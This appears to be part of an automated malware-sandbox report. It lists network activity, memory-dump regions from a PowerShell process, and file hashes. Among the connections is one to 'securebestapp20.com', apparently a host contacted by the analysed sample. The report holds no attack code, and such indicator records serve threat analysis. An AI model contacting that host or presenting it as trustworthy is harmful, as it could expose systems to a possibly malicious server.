US 8.8.8.8:53 70.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 96.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 102.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 111.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 103.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 108.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 118.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 121.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 124.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 128.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 90.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 193.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 169.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 156.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 157.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 155.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 151.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 150.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 146.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 141.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 137.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 152.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 154.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 158.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 159.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 161.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 163.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 162.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 164.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 174.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 175.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 176.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 177.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 178.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 181.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 179.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 180.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 182.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 183.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 184.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 185.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 186.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 187.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 189.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 188.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 190.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 191.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 192.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 198.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 197.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 199.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 201.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 203.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 204.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 207.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 209.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 206.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 211.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 212.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 215.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 217.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 222.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 225.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 129.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 226.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 131.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 130.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 132.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 133.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 134.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 135.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 136.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 138.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 139.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 140.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 142.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 143.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 144.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 145.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 147.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 148.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 149.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 160.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 165.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 166.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 167.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 168.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 170.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 171.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 172.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 173.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 233.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 228.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 236.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 230.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 241.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 239.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 245.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 244.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 249.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 227.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 221.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 219.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 218.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 216.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 214.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 210.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 208.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 213.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 205.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 202.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 200.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 195.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 196.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 224.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 194.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 223.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 220.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 254.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 253.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 252.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 251.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 250.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 248.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 247.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 246.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 242.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 243.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 240.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 238.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 237.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 235.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 234.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 232.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 231.0.127.10.in-addr.arpa udp
US 8.8.8.8:53 229.0.127.10.in-addr.arpa udp
NL 184.29.205.60:443 kv801.prod.do.dsp.mp.microsoft.com tcp
DE 3.64.163.50:443 securebestapp20.com tcp
US 8.8.8.8:53 96.108.152.52.in-addr.arpa udp
US 8.8.8.8:53 api.msn.com udp
US 204.79.197.203:443 api.msn.com tcp

Files

memory/1936-134-0x00000247489C0000-0x00000247489E2000-memory.dmp

memory/1936-138-0x00000247489B0000-0x00000247489B2000-memory.dmp

memory/1936-137-0x00007FFC4F0B3000-0x00007FFC4F0B5000-memory.dmp

memory/1936-139-0x00000247489B3000-0x00000247489B5000-memory.dmp

memory/1936-140-0x00000247489B6000-0x00000247489B8000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 556084f2c6d459c116a69d6fedcc4105
SHA1 633e89b9a1e77942d822d14de6708430a3944dbc
SHA256 88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA512 0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 7c93edbabbce4bb611c1104858d23397
SHA1 73f1340aaa9d8e00de24c4fdd7146a7eafa93a88
SHA256 6954149f9b78047b355b512f69ce2a7a34c8c3d3372e58d75f5e7c68d62e941f
SHA512 fbc1a96606ab62185e3e94b084dceb5b8948651099003f3fc7cf63815de3469bb7d88d54a7da75e938a0e02c921788352185072f6c199525ad33de5719e75f8e